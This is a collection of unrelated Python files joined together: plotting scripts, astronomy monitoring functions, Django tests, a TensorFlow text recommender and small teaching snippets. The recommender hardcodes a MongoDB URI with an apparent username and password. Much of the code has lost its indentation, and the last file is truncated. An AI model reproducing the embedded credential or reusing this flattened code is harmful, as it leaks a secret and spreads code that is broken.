ax1.plot(K_time, K_Q, 'r-o', label='K', linewidth='2', zorder=5, ms=5)
#ax1.fill_between(x,UHG_flow,facecolor='gray', alpha=0.25)
#ax1.minorticks_on()
ax1.grid(which='major', axis='both', color='black', linestyle='-', zorder=3)
ax1.grid(which='minor', axis='both', color='grey', linestyle='-', zorder=3)
majorLocator = MultipleLocator(6)
ax1.xaxis.set_major_locator(majorLocator)
ax1.yaxis.set_minor_locator(AutoMinorLocator(2))
ax1.set_xlabel('Time (hr)')
ax1.set_ylabel('Flow (cfs)')
#Make tick labels smaller/rotate for long UHGs
if max_time >= 100:
for label in ax1.xaxis.get_ticklabels():
label.set_fontsize(8)
if max_time >= 160:
for label in ax1.xaxis.get_ticklabels():
label.set_fontsize(6)
plt.xticks(rotation=90)
majorLocator = MultipleLocator(12)
ax1.xaxis.set_major_locator(majorLocator)
ax1.set_xlim([0,max_time+3])
plt.ylim(ymin=0)
#add plot legend with location and size
ax1.legend(loc='upper right', prop={'size':10})
plt.title(name[:5] + ': ' + inflow_basin + ' LAG/K Parameters')
figname = maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\LAGK_plots\\' + name + '_lagk.png'
plt.savefig(figname, dpi=100)
plt.clf()
plt.close()
#Delete temporary .txt file holding .xml contents
os.remove(maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\' + name + '.txt')
os.remove(maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\' + name + '_LAGK_Params.txt')
    print 'Total LAG/K files extracted: ' + str(basin_count)
csv_file.close()
###################################################################################################################################
print 'Script Complete'
print str(datetime.now())
|
#!/usr/bin/env /data/mta/Script/Python3.8/envs/ska3-shiny/bin/python
#################################################################################
# #
# acis_sci_run_functions.py: collection of functions used by acis sci run #
# #
# author: t. isobe (tisobe@cfa.harvard.edu) #
# #
# last update: Feb 26, 2021 #
# #
#################################################################################
import os
import sys
import re
import string
import random
import time
import Chandra.Time
path = '/data/mta/Script/ACIS/Acis_sci_run/house_keeping/dir_list_py_t'
f = open(path, 'r')
data = [line.strip() for line in f.readlines()]
f.close()
for ent in data:
atemp = re.split(':', ent)
var = atemp[1].strip()
line = atemp[0].strip()
exec("%s = %s" %(var, line))
#
#--- append a path to a private folder to python directory
#
sys.path.append(bin_dir)
sys.path.append(mta_dir)
#
#--- converTimeFormat contains MTA time conversion routines
#
import mta_common_functions as mcf
#
#--- temp writing file name
#
rtail = int(time.time() * random.random())
zspace = '/tmp/zspace' + str(rtail)
http_dir = 'https://cxc.cfa.harvard.edu/mta_days/mta_acis_sci_run/'
#
#--- NOTE:
#--- because we need to run tests, the web_dir read from dir_list_py cannot be used; instead
#--- the main script's web_dir is passed in as the local html_dir variable. (Apr 26, 2013)
#
#-----------------------------------------------------------------------------------------------
#--- removeDuplicated: remove duplicated entries ---
#-----------------------------------------------------------------------------------------------
def removeDuplicated(ifile):
"""
remove duplicated rows from the file
Input: file --- a file name of the data
Output: file --- cleaned up data
"""
data = mcf.read_data_file(ifile)
if len(data) > 0:
first = data.pop(0)
new = [first]
for ent in data:
chk = 0
for comp in new:
if ent == comp:
chk = 1
break
if chk == 0:
new.append(ent)
#
#--- now print out the cleaned up data
#
with open(ifile, 'w') as f:
for ent in new:
line = ent + '\n'
f.write(line)
#-----------------------------------------------------------------------------------------------
#--- acis_sci_run_print_html: update html pages --
#-----------------------------------------------------------------------------------------------
def acis_sci_run_print_html(html_dir, pyear, pmonth, pday):
"""
    update three html pages for the given year (pyear)
Input: html_dir --- web directory path
pyear --- the year you want to update the html pages
pmonth --- current month
pday --- current month date
Output: science_run.html
science_run<year>.html
"""
#
#--- set substitution values
#
pyear = int(pyear)
cpmon = mcf.add_leading_zero(int(float(pmonth)))
cpday = mcf.add_leading_zero(int(float(pday)))
update = str(pyear) + '-' + str(cpmon) + '-' + str(cpday)
ydate = int(float(time.strftime("%j", time.strptime(update, '%Y-%m-%d'))))
#
#--- make a link table
#
ylist = ''
j = 0
for ryear in range(1999, pyear+1):
ylist = ylist + '<td><a href=' + http_dir + '/Year' + str(ryear)
ylist = ylist + '/science_run' + str(ryear) + '.html>'
ylist = ylist + '<strong>Year ' + str(ryear) + '</strong></a><br /><td />\n'
#
#--- every 6 years, break a row
#
if j == 5:
j = 0
ylist = ylist + '</tr><tr>\n'
else:
j += 1
#
#---- update the main html page
#
template = house_keeping + 'science_run.html'
outfile = html_dir + 'science_run.html'
print_html_page(template, update, pyear, ylist, outfile)
#
#--- update sub directory html pages
#
ystop = pyear + 1
for syear in range(1999, ystop):
template = house_keeping + 'sub_year.html'
outfile = html_dir + 'Year' + str(syear) + '/science_run' + str(syear) + '.html'
if syear == pyear:
ldate = update
else:
ldate = str(syear) + '-12-31'
print_html_page(template, ldate, syear, ylist, outfile)
#-----------------------------------------------------------------------------------------------
#-- print_html_page: read template and update the html page --
#-----------------------------------------------------------------------------------------------
def print_html_page(template, update, syear, ylist, outfile):
"""
read template and update the html page
input: template --- the template file name
           update --- updated date
           syear --- year
ylist --- html table containing links to sub directories
outfile --- html file name
output: outfile
"""
f = open(template, 'r')
hfile = f.read()
f.close()
temp0 = hfile.replace('#UPDATE#', update)
temp1 = temp0.replace('#YEAR#', str(syear))
temp2 = temp1.replace('#YLIST#', str(ylist))
with open(outfile, 'w') as f:
f.write(temp2)
#-----------------------------------------------------------------------------------------------
#--- checkEvent: check high event/error/drop cases, and send out a warning message if needed ---
#-----------------------------------------------------------------------------------------------
def checkEvent(html_dir, etype, event, year, criteria, dname):
"""
check high event/error/drop cases, and send out a warning message if needed
input: html_dir --- web directory path
etype --- type of error e.g. drop for Te3_3
event --- event name e.g. Te3_3
criteria --- cut off e.g. 3.0 for Te3_3
dname --- table name e.g. drop rate(%)
output: ofile --- updated with newly found violation
"""
#
#----- read the main table and file new entries
#
ifile = html_dir + 'Year' + str(year) + '/' + event + '_out'
cdata = mcf.read_data_file(ifile)
#
#----- check data type: drop rate, high error, and high event
#
mchk = re.search('drop', etype)
mchk2 = re.search('error', etype)
new_list = []
sline = ''
for ent in cdata:
atemp = re.split('\s+', ent)
#
#--- if the case is "drop" rate, the pass the data as it is
#
if mchk is not None:
try:
cval = float(atemp[9]) #--- drop rate
except:
continue
#
#--- otherwise normalize the data
#
else:
cval = 0
try:
val6 = float(atemp[6])
if val6 > 0:
if mchk2 is not None:
cval = float(atemp[8])/val6 #--- high error
else:
cval = float(atemp[7])/val6 #--- high count
except:
continue
#
#--- here is the selection criteria
#
if cval > criteria:
cval = round(cval, 3)
#
#--- limit length of description to 20 letters
#
alen = len(atemp[11])
if alen < 20:
dline = atemp[11]
for i in range(alen, 20):
dline = dline + ' '
else:
dline = ''
for i in range(0, 20):
dline = dline + atemp[11][i]
#
#--- some formatting adjustments
#
if len(atemp[0]) < 4:
sp = '\t\t'
else:
sp = '\t'
if len(atemp[1]) < 12:
sp2 = '\t\t\t'
else:
sp2 = '\t\t'
tlen = len(atemp[6])
lval = atemp[6]
for k in range(tlen,4):
lval = ' ' + lval
line = atemp[0] + sp + dline + '\t' + atemp[1] + sp2
line = line + lval + '\t' + atemp[2] + '\t' + atemp[3] + '\t\t'
line = line + atemp[10] + '\t' + str(cval) + '\n'
sline = sline + line
new_list.append(line)
#
#--- print out the table
#
aline = 'obsid target start time int time inst '
aline = aline + 'ccd grat ' + dname + '\n'
aline = aline + '-------------------------------------------------------------'
aline = aline + '----------------------------------------------\n'
aline = aline + sline
ofile = web_dir + 'Year' + str(year) + '/'+ etype + '_' + str(year)
with open(ofile, 'w') as fo:
fo.write(aline)
return new_list
#-----------------------------------------------------------------------------------------------
#-- updateLongTermTable: update a long term violation tables ---
#-----------------------------------------------------------------------------------------------
def updateLongTermTable(html_dir, event, this_year, dname):
"""
updates long term violation tables
Input: html_dir --- web directory path
events --- name of events such as drop (te3_3)
this_year --- the latest year
dname --- column name to use
Output:
violation table file named "event"
"""
line = ''
ytop = int(this_year) + 1
for year in range(1999, ytop):
#line = line + '\nYear' + str(year) + '\n'
fname = html_dir + 'Year' + str(year) + '/' + event.lower() + '_' + str(year)
data = mcf.read_data_file(fname)
for ent in data:
atemp = re.split('\s+', ent)
try:
val = float(atemp[0])
otime = atemp[2]
ntime = str(year) + ':' + otime
ent = ent.replace(otime, ntime)
line = line + ent + '\n'
except:
pass
#
#--- write out the table
#
hline = 'obsid target start time int time inst ccd grat ' + dname + '\n'
hline = hline + '-----------------------------------------------------------------------------------------------------------\n'
line = hline + line
oname = html_dir + 'Long_term/' + event.lower()
with open(oname, 'w') as fo:
fo.write(line)
#-----------------------------------------------------------------------------------------------
#-- updateLongTermTable2: update long term sub data tables ---
#-----------------------------------------------------------------------------------------------
def updateLongTermTable2(html_dir, event, this_year):
"""
update long term sub data tables
Input: html_dir web directory path
event name of the event such as te3_3
this_year the latest year
    Output: sub data file such as te3_3_out
"""
line = ''
ytop = int(this_year) + 1
for year in range(1999, ytop):
#
#--- check leap year
#
if mcf.is_leapyear(year):
base = 366.0
else:
base = 365.0
#
#--- read each year's data
#
fname = html_dir + 'Year' + str(year) + '/' + event.lower() + '_out'
data = mcf.read_data_file(fname)
if len(data) == 0:
continue
for ent in data:
atemp = re.split('\t+|\s+', ent)
try:
val = float(atemp[0])
btemp = re.split(':', atemp[1])
#
#--- convert time to year date to fractional year
#
time = float(year) + (float(btemp[0]) + float(btemp[1])/ 86400.0 ) / base
time = round(time, 3)
dlen = len(atemp)
dlst = dlen -1
for j in range(0, dlen):
if j == 1:
line = line + str(time) + '\t'
elif j == dlst:
line = line + atemp[j] + '\n'
else:
line = line + atemp[j] + '\t'
except:
pass
oname = html_dir + 'Long_term/' + event.lower() + '_out'
with open(oname, 'w') as fo:
fo.write(line)
#-----------------------------------------------------------------------------------------------
#-- chkNewHigh: sending out email to warn that there are value violations            ----
#-----------------------------------------------------------------------------------------------
def chkNewHigh(old_list, new_list, event, dname):
"""
    sending out email to warn that there are value violations
Input: old_list: old violation table
new_list: new violation table
event: event name
dname: column name to be used
"""
wchk = 0
#
#--- compare old and new list and if there are new entries, save them in "alart"
#
alart = []
for ent in new_list:
chk = 0
ntemp = re.split('\t+|\s+', ent)
for comp in old_list:
otemp = re.split('\t+|\s+', comp)
if(ent == comp) or (ntemp[0] == otemp[0]):
chk = 1
break
if chk == 0:
alart.append(ent)
wchk += 1
#
#--- if there are violations, send out email
#
if wchk > 0:
line = 'ACIS Science Run issued the following warning(s)\n\n'
line = line + "The following observation has a " + event + "Rate in today's science run\n\n"
line = line + 'obsid target start time int time '
line = line + 'inst ccd grat ' + dname + '\n'
line = line + '------------------------------------------------------------'
line = line + '-------------------------------------------\n'
for ent in alart:
line = line + ent + '\n'
        line = line + '\nPlease check: https://cxc.cfa.harvard.edu/mta_days/mta_acis_sci_run/'
line = line + 'science_run.html\n'
line = line + '\n or MIT ACIS Site: https://acisweb.mit.edu/asc/\n'
with open(zspace, 'w') as f:
            f.write(line)
cmd = 'cat ' + zspace + '|mailx -s \"Subject: ACIS Science Run Alert<>'
cmd = cmd + event + 'Rate" isobe\@head.cfa.harvard.edu'
# cmd = 'cat ' + zspace + '|mailx -s \"Subject: ACIS Science Run Alert<>'
# cmd = cmd + event + 'Rate" isobe\@head.cfa.harvard.edu '
# cmd = cmd + swolk\@head.cfa.harvard.edu acisdude\@head.cfa.harvard.edu"'
os.system(cmd)
mcf.rm_files(zspace)
#-----------------------------------------------------------------------------------------------
#-- convert_to_chandra_time: convert time into Chandra Time --
#-----------------------------------------------------------------------------------------------
def convert_to_chandra_time(dtime, ifmt='%Y:%m:%d:%H:%M:%S'):
"""
convert time into Chandra Time
input: dtime --- original time in ifmt
ifmt --- time format
output: stime --- seconds from 1998.1.1
"""
out = time.strftime("%Y:%j:%H:%M:%S", time.strptime(dtime, ifmt))
stime = int(Chandra.Time.DateTime(out).secs)
return stime
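#-----------------------------------------------------------------------------------------------
#-- usage note (illustrative example only; the date below is an assumption, not real data)   ---
#-----------------------------------------------------------------------------------------------
#
#--- convert_to_chandra_time('2021:02:26:00:00:00') returns the integer number of seconds
#--- since 1998.1.1 using the default '%Y:%m:%d:%H:%M:%S' input format; pass ifmt to parse
#--- other layouts, e.g. convert_to_chandra_time('2021057', ifmt='%Y%j') for year + day of year.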
|
#!/usr/bin/env python3 -u
# Run python with -u to flush output directly
import sys
import argparse
import numpy as np
import matplotlib.pyplot as plt
parser = argparse.ArgumentParser()
parser.add_argument("file", help="file path to analyze")
parser.add_argument("--no-inputs", help="no display inputs", action="store_true")
parser.add_argument("--no-targets", help="no display targets", action="store_true")
parser.add_argument("-n", "--number", help="max number of inputs and targets displayed", type=int, default=0)
args = parser.parse_args()
path = args.file
print "Loading ", args.file
file = open(path, "r")
input_data = []
target_data = []
l = 0
inputs_nb = 0
inputs_target = 0
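# Each usable line is expected to look like "<inputs> : <targets>", e.g. (illustrative):
#   0.1; 0.2; 0.3 : 1.0; -1.0
# values are whitespace-separated floats with any trailing '\' or ';' stripped below;
# malformed lines are silently skipped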
for line in file:
error = False
splitted = line.split(":")
if len(splitted) != 2:
continue
raw_inputs = splitted[0].split()
raw_targets = splitted[1].split()
inputs = []
targets = []
for i in range(len(raw_inputs)):
try:
inputs.append( float(raw_inputs[i].strip("\\;")) )
except ValueError:
error = True
break
for i in range(len(raw_targets)):
try:
targets.append( float(raw_targets[i].strip("\\;")) )
except ValueError:
error = True
break
if error:
continue
input_data.append(inputs)
target_data.append(targets)
print "Done with loaded data (size=" + str(len(input_data)) + ")"
subplots = 0
if args.no_inputs is False:
input_data = np.matrix(input_data).transpose()
input_mean = np.mean(input_data, axis=1).getA1()
input_data_size = input_data.shape[0]
subplots += min(args.number, input_data_size) if args.number != 0 else input_data_size
if args.no_targets is False:
target_data = np.matrix(target_data).transpose()
target_mean = np.mean(target_data, axis=1).getA1()
target_data_size = target_data.shape[0]
subplots += min(args.number, target_data_size) if args.number != 0 else target_data_size
print "Done with matrix operations. Shape is " + str(input_data_size) + ":" + str(target_data_size)
######## DISPLAY
n = 0
sax = plt.subplot(subplots, 1, 1)
if args.no_inputs is False:
for i in range(input_data_size):
n += 1
ax = sax if n == 1 else plt.subplot(subplots, 1, n, sharex=sax)
data = input_data[i].getA1()
plt.plot(data)
plt.plot([0, len(data)], [input_mean[i], input_mean[i]], "g")
ax.set_xlim(0, len(data))
# ax.set_ylim(-1.1, 1.1)
if args.number != 0 and i >= min(args.number, input_data_size)-1:
break
if args.no_targets is False:
for i in range(target_data_size):
n += 1
ax = sax if n == 1 else plt.subplot(subplots, 1, n, sharex=sax)
data = target_data[i].getA1()
plt.plot(data, "r")
plt.plot([0, len(data)], [target_mean[i], target_mean[i]], "g")
ax.set_xlim(0, len(data))
ax.set_ylim(-1.1, 1.1)
if args.number != 0 and i >= min(args.number, target_data_size)-1:
break
plt.show()
######## END DISPLAY
|
from PyQt4.QtGui import *
class MyDialog(QDialog):
def __init__(self):
QDialog.__init__(self)
ed = QLineEdit()
ed.setText("홍길동") #텍스트 쓰기
text = ed.text() #텍스트 읽기
# # Watermark로 텍스트 표시
# ed.setPlaceholderText("이름을 입력하시오")
# # 텍스트 모두 선택
# ed.selectAll()
# 에디트는 읽기 전용으로
ed.setReadOnly(True)
#
# # Password 스타일 에디트
# ed.setEchoMode(QLineEdit.Password)
# Layout
layout = QVBoxLayout()
layout.addWidget(ed)
# Set layout on a MyDialog
self.setLayout(layout)
# app
app = QApplication([])
dialog = MyDialog()
dialog.show()
app.exec_()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Mar 23 11:04:54 2020
@author: ctralie
A basic example of dictionaries
"""
import numpy as np
import pickle
chris = {
'year':'supersenior',
'major':'ee',
'brand':'acer',
'grades':{
'audio':95,
'image':60,
'nbody':100
},
10: [-1, 5, 2, 4]
}
chris['favassignment'] = 'fractal'
del chris['grades']
keys = list(chris.keys())
values = list(chris.values())
for myvar in chris.keys():
print(myvar, " value is ", chris[myvar])
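# pickle and numpy are imported above but not exercised; a minimal sketch of
# persisting the dictionary with pickle (the file name "chris.pkl" is only an
# illustrative choice):
with open("chris.pkl", "wb") as fout:
    pickle.dump(chris, fout)
with open("chris.pkl", "rb") as fin:
    chris_copy = pickle.load(fin)
print("round-tripped copy equals original:", chris_copy == chris)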
|
""" api/tests.py """
from django.test import TestCase
from django.urls import reverse
from rest_framework import status
from rest_framework.test import APIClient
from .models import Shoppinglist
# Create your tests here.
class ModelTestCases(TestCase):
""" Test cases for models """
def setUp(self):
""" Define test variables """
self.shoppinglist = Shoppinglist(
name="Christmass shopping", description="Shopping for 2018 christmass")
def test_shoppinglist_model(self):
""" Test Shoppinglist model is created """
old_count = Shoppinglist.objects.count()
self.shoppinglist.save()
new_count = Shoppinglist.objects.count()
self.assertNotEqual(old_count, new_count)
class ViewTestCases(TestCase):
""" Test cases for views """
def setUp(self):
""" Define test client """
self.client = APIClient()
self.shoppinglist_data = {
"name": "Easter shopping", "description": " Shopping to gift mum this easter."}
self.response = self.client.post(
reverse('api:create_list'),
self.shoppinglist_data,
format="json")
# get shoppinglist from model
self.shoppinglist = Shoppinglist.objects.get()
def test_shoppinglist_is_created(self):
""" test api can create a shoppinglist """
self.assertEqual(self.response.status_code, status.HTTP_201_CREATED)
def test_api_can_get_single_shoppinglist(self):
""" test api can get one shoppinglist """
response = self.client.get(
reverse('api:shoppinglist_details', kwargs={'pk': self.shoppinglist.id}),
format="json")
self.assertContains(response, self.shoppinglist)
def test_api_can_edit_shoppinglist(self):
""" test api can get edit a shoppinglist """
new_shoppinglist_data = {
"name": "Christmass shopping", "description": " Christmass gift 2018."}
response = self.client.put(
reverse('api:shoppinglist_details', kwargs={'pk': self.shoppinglist.id}),
new_shoppinglist_data,
format="json"
)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_api_can_delete_shoppinglist(self):
""" test api can get delete a shoppinglist """
response = self.client.delete(
reverse('api:shoppinglist_details', kwargs={'pk': self.shoppinglist.id}),
format="json"
)
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
|
from flask import Flask, render_template, request
import tensorflow as tf
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from bson.objectid import ObjectId
from pymongo import MongoClient, cursor
from tensorflow import keras
from tensorflow.keras import layers ,callbacks
client = MongoClient('mongodb+srv://recommendation-yradx:vOghBXFE9ReZo40k@develop.r2hgr.mongodb.net/recommendation?authSource=admin&replicaSet=atlas-siynys-shard-0&w=majority&readPreference=primary&appname=MongoDB%20Compass&retryWrites=true&ssl=true')
db=client['recommendation-ldprod']
#db=client.recommendation
"""**DATA 01 : BOOKMARKS**"""
res1 = db.op_bookmarks.find()
dat1 = pd.DataFrame(list(res1))
dat1.rename(columns = {'_id' : 'id_bookmark'} , inplace=True)
dat1.rename(columns = {'user' : 'id_user'} , inplace=True)
dat1.rename(columns = {'text' : 'id_text'} , inplace=True)
dat1=dat1.drop(['id_bookmark','updatedAt','createdAt','__v'], axis=1)
if not (dat1.id_text.empty):
dat1.insert(2, "Event1", "Bookmark", allow_duplicates=True)
else :
    dat1['Event1'] = "NaN"
dat1=dat1.drop_duplicates()
"""**DATA 02: READS**"""
res2 = db.rc_reads.find()
dat2 = pd.DataFrame(list(res2))
dat2.rename(columns = {'_id' : 'id_read'} , inplace=True)
dat2.rename(columns = {'user' : 'id_user'} , inplace=True)
dat2.rename(columns = {'text' : 'id_text'} , inplace=True)
dat2=dat2.drop(['id_read','updatedAt','createdAt','__v' ], axis=1)
dat2['roles'] = [str(a) for a in dat2['roles']]
dat2['roles']=dat2['roles'].str.strip('[' ']')
dat2['roles']=dat2['roles'].str.strip( "' ")
dat2['roles']=dat2['roles'].str.replace( "', '" ,"," )
if not (dat2.id_text.empty):
dat2.insert(2, "Event2", "Read", allow_duplicates=True)
else :
    dat2['Event2'] = "NaN"
indexNames=dat2[dat2["roles"].str.contains("activeClient|activeProspect") == False].index
dat2 =dat2.drop(indexNames, axis=0)
dat2=dat2.drop_duplicates()
"""**DATA 03 : COPIES**"""
res3 = db.rc_copies.find()
dat3 = pd.DataFrame(list(res3))
dat3.rename(columns= {'text': 'id_text'},inplace=True)
dat3.rename(columns= {'user': 'id_user'},inplace=True)
dat3=dat3.drop(['_id' ,'agent', 'host',"content",'createdAt','updatedAt', '__v'] , axis = 1)
if not (dat3.id_text.empty):
dat3.insert(2, "Event3", "Copy", allow_duplicates=True)
else :
    dat3['Event3'] = "NaN"
dat3=dat3.drop_duplicates()
"""**Jointure des 03 datas**"""
df1= pd.merge(dat2, dat1, on=["id_user","id_text"] ,how='left')
df2 =pd.merge(df1, dat3, on=["id_user","id_text"],how='outer')
df2 = df2[['id_user','id_text','title','Event1','Event2','Event3']]
df2=df2.drop_duplicates()
"""**ATTRIBUTION DES POIDS A CHAQUE EVENT**"""
event_type_strength = {
'NaN' : 0.0 ,
'Read': 1.0,
'Copy': 2.0,
'Bookmark': 3.0,
'Like' : 4.0
}
df2['Event1'] = df2['Event1'].fillna("NaN")
df2['Event2'] = df2['Event2'].fillna("NaN")
df2['Event3'] = df2['Event3'].fillna("NaN")
df2['Event1'] = df2['Event1'].apply(lambda x: event_type_strength[x])
df2['Event2'] = df2['Event2'].apply(lambda x: event_type_strength[x])
df2['Event3'] = df2['Event3'].apply(lambda x: event_type_strength[x])
df2.insert(6, "rating", 0.0, allow_duplicates=False)
df2['rating'] = df2.sum(axis=1)
col_list = ['id_user','id_text','title','rating']
df2 = df2[col_list]
titre_null=df2[df2['title'].isnull()].index
df2 =df2.drop(titre_null, axis=0)
df2 =df2.drop_duplicates()
"""**Méthode 01 : Neural Networks**"""
data0=df2
user_ids = data0["id_user"].unique().tolist()
user2user_encoded = {x: i for i, x in enumerate(user_ids)}
userencoded2user = {i: x for i, x in enumerate(user_ids)}
text_ids = data0["id_text"].unique().tolist()
text2text_encoded = {x: i for i, x in enumerate(text_ids)}
text_encoded2text = {i: x for i, x in enumerate(text_ids)}
data0["user"] = data0["id_user"].map(user2user_encoded)
data0["text"] = data0["id_text"].map(text2text_encoded)
num_users = len(user2user_encoded)
num_texts = len(text_encoded2text)
data0["rating"] = data0["rating"].values.astype(np.float32)
# min and max ratings will be used to normalize the ratings later
min_rating = min(data0["rating"])
max_rating = max(data0["rating"])
print(
"Number of users: {}, Number of Texts: {}, Min rating: {}, Max rating: {}".format(
num_users, num_texts, min_rating, max_rating
)
)
data0 = data0.sample(frac=1, random_state=42)
x = data0[["user", "text"]].values
# Normalize the targets between 0 and 1. Makes it easy to train.
y = data0["rating"].apply(lambda x: (x - min_rating) / (max_rating - min_rating)).values
# Assuming training on 90% of the data and validating on 10%.
train_indices = int(0.9 * data0.shape[0])
x_train, x_val, y_train, y_val = (
x[:train_indices],
x[train_indices:],
y[:train_indices],
y[train_indices:],
)
EMBEDDING_SIZE = 50
class RecommenderNet(keras.Model):
def __init__(self, num_users, num_texts, embedding_size, **kwargs):
super(RecommenderNet, self).__init__(**kwargs)
self.num_users = num_users
self.num_texts = num_texts
self.embedding_size = embedding_size
self.user_embedding = layers.Embedding(
num_users,
embedding_size,
embeddings_initializer="he_normal",
embeddings_regularizer=keras.regularizers.l2(1e-6),
)
self.user_bias = layers.Embedding(num_users, 1)
self.text_embedding = layers.Embedding(
num_texts,
embedding_size,
embeddings_initializer="he_normal",
embeddings_regularizer=keras.regularizers.l2(1e-6),
)
self.text_bias = layers.Embedding(num_texts, 1)
def call(self, inputs):
user_vector = self.user_embedding(inputs[:, 0])
user_bias = self.user_bias(inputs[:, 0])
text_vector = self.text_embedding(inputs[:, 1])
text_bias = self.text_bias(inputs[:, 1])
dot_user_text = tf.tensordot(user_vector, text_vector, 2)
# Add all the components (including bias)
x = dot_user_text + user_bias + text_bias
# The sigmoid activation forces the rating to between 0 and 1
return tf.nn.sigmoid(x)
model1 = RecommenderNet(num_users, num_texts, EMBEDDING_SIZE)
earlystopping = callbacks.EarlyStopping(monitor ="val_loss", mode ="min", patience = 5 ,restore_best_weights = False)
opt = tf.keras.optimizers.Adam(learning_rate=0.01 )
model1.compile(
optimizer=opt,
loss='mean_squared_error',
metrics=['accuracy']
)
history = model1.fit(
x=x_train,
y=y_train,
batch_size=32,
epochs=100,
verbose=1,
validation_split=0.2,
validation_data=(x_val, y_val),
callbacks =[earlystopping]
)
model1.summary()
#tf.keras.utils.plot_model(model1, to_file='model1.png')
"""
# Plot the loss function
fig, ax = plt.subplots(1, 1, figsize=(10,6))
ax.plot(np.sqrt(history.history['loss']), 'r', label='train')
ax.plot(np.sqrt(history.history['val_loss']), 'b' ,label='val')
ax.set_xlabel(r'Epoch', fontsize=20)
ax.set_ylabel(r'Loss', fontsize=20)
ax.legend()
ax.tick_params(labelsize=20)
# Plot the mean_squared_error
fig, ax = plt.subplots(1, 1, figsize=(10,6))
ax.plot(np.sqrt(history.history['mean_squared_error']), 'r', label='train')
ax.plot(np.sqrt(history.history['val_mean_squared_error']), 'b' ,label='val')
ax.set_xlabel(r'Epoch', fontsize=20)
ax.set_ylabel(r'MeanSquaredError', fontsize=20)
ax.legend()
ax.tick_params(labelsize=20)
# Plot the accuracy
fig, ax = plt.subplots(1, 1, figsize=(10,6))
ax.plot(np.sqrt(history.history['accuracy']), 'r', label='train')
ax.plot(np.sqrt(history.history['val_accuracy']), 'b' ,label='val')
ax.set_xlabel(r'Epoch', fontsize=20)
ax.set_ylabel(r'Accuracy', fontsize=20)
ax.legend()
ax.tick_params(labelsize=20)
plt.plot(history.history["loss"])
plt.plot(history.history["val_loss"])
plt.title("model loss")
plt.ylabel("loss")
plt.xlabel("epoch")
plt.legend(["train", "test"], loc="upper left")
plt.show()
"""
# Let us get a user and see the top recommendations.
def recommended_texts1(user_id) :
user_id = ObjectId(user_id)
#user_id = df2.id_user.sample(1).iloc[0]
# Let us get a user and see the top recommendations.
#user_id = df2.id_user.sample(1).iloc[0]
texts_watched_by_user = data0[data0.id_user == user_id]
texts_not_watched = data0[
~data0["id_text"].isin(texts_watched_by_user.id_text.values)
]["id_text"]
texts_not_watched = list(
set(texts_not_watched).intersection(set(text2text_encoded.keys()))
)
texts_not_watched = [[text2text_encoded.get(x)] for x in texts_not_watched]
user_encoder = user2user_encoded.get(user_id)
user_text_array = np.hstack(
([[user_encoder]] * len(texts_not_watched), texts_not_watched )
)
user_text_array1 = tf.convert_to_tensor(user_text_array, np.float32)
ratings = model1.predict(user_text_array1).flatten()
top_ratings_indices = ratings.argsort()[-10:][::-1]
recommended_text_ids = [
text_encoded2text.get(texts_not_watched[x][0]) for x in top_ratings_indices
]
top_texts_user = (
texts_watched_by_user.sort_values(by="rating", ascending=False)
.head(5)
.title
#.id_text.values
)
liste1= []
#movie_df_rows = data0[data0["title"].isin(top_texts_user)]
for row in top_texts_user:
liste1.append(row)
return liste1
def recommended_texts2(user_id) :
user_id = ObjectId(user_id)
#user_id = df2.id_user.sample(1).iloc[0]
# Let us get a user and see the top recommendations.
#user_id = df2.id_user.sample(1).iloc[0]
texts_watched_by_user = data0[data0.id_user == user_id]
texts_not_watched = data0[
~data0["id_text"].isin(texts_watched_by_user.id_text.values)
]["id_text"]
texts_not_watched = list(
set(texts_not_watched).intersection(set(text2text_encoded.keys()))
)
texts_not_watched = [[text2text_encoded.get(x)] for x in texts_not_watched]
user_encoder = user2user_encoded.get(user_id)
user_text_array = np.hstack(
([[user_encoder]] * len(texts_not_watched), texts_not_watched )
)
user_text_array1 = tf.convert_to_tensor(user_text_array, np.float32)
ratings = model1.predict(user_text_array1).flatten()
top_ratings_indices = ratings.argsort()[-10:][::-1]
recommended_text_ids = [
text_encoded2text.get(texts_not_watched[x][0]) for x in top_ratings_indices
]
recommended_texts = data0[data0["id_text"].isin(recommended_text_ids)]
recommended_texts=recommended_texts.drop_duplicates('title')
liste2 = []
for row in recommended_texts.iterrows():
liste2.append(row[1].title)
return liste2
print("*************FIN**************")
|
#!/usr/bin/python3.4
# -*- coding: utf-8 -*-
liste = [1, 2, 3]
liste2 = list(liste)
liste2.append(4)
print("liste = {}, liste2 = {}".format(liste, liste2))
print("id liste = {}, id liste2 = {}".format(id(liste), id(liste2)))
liste2 = liste
print("id liste = {}, id liste2 = {}".format(id(liste), id(liste2)))
|
import pandas as pd
import matplotlib.pyplot as plt
df = pd.read_csv('data.csv', index_col='year')
# House Price per square foot
df['pxHousePerSqFt'] = df.medPrice / df.medSqFt
# Gallons of Oil per Barrel
bVol = 42.0
# Need 7.48 gallons of oil to raise 1SqFt by 1Ft
galPerCuFt = 7.48
# Cubic feet per barrel
cuFtPerBar = bVol / galPerCuFt
# Oil Price per cubic foot
df['pxOilPerCuFt'] = df.wtisplc / cuFtPerBar
# Oily House Index = House (sqFt) over Oil (cuFt)
df['OHI'] = df.pxHousePerSqFt / df.pxOilPerCuFt
# Forcing higher house price to match XKCD
#df['OHI'] = (df.pxHousePerSqFt * 1.2) / df.pxOilPerCuFt
# What about 80% LTV?
with plt.xkcd():
axes = df.plot(y=['medPrice', 'medSqFt', 'pxHousePerSqFt', 'wtisplc'], subplots=True, layout=(2,2), figsize=(10,8))
axes[1,0].set_xlabel('')
axes[1,1].set_xlabel('')
plt.tight_layout()
plt.savefig('graphs.png')
plt.show()
with plt.xkcd():
axes = df.plot(y=['OHI'], figsize=(10.1,5))
axes.set_xlabel('')
plt.tight_layout()
plt.savefig('ohi.png')
plt.show()
|
class Solution:
# https://leetcode.com/problems/longest-palindromic-substring/discuss/2954/Python-easy-to-understand-solution-with-comments-(from-middle-to-two-ends)
def longestPalindrome(self, s):
"""
:type s: str
:rtype: str
"""
res = ""
for i in range(len(s)):
temp = self.isPalindromicSubstring(s, i, i)
if len(res) < len(temp):
res = temp
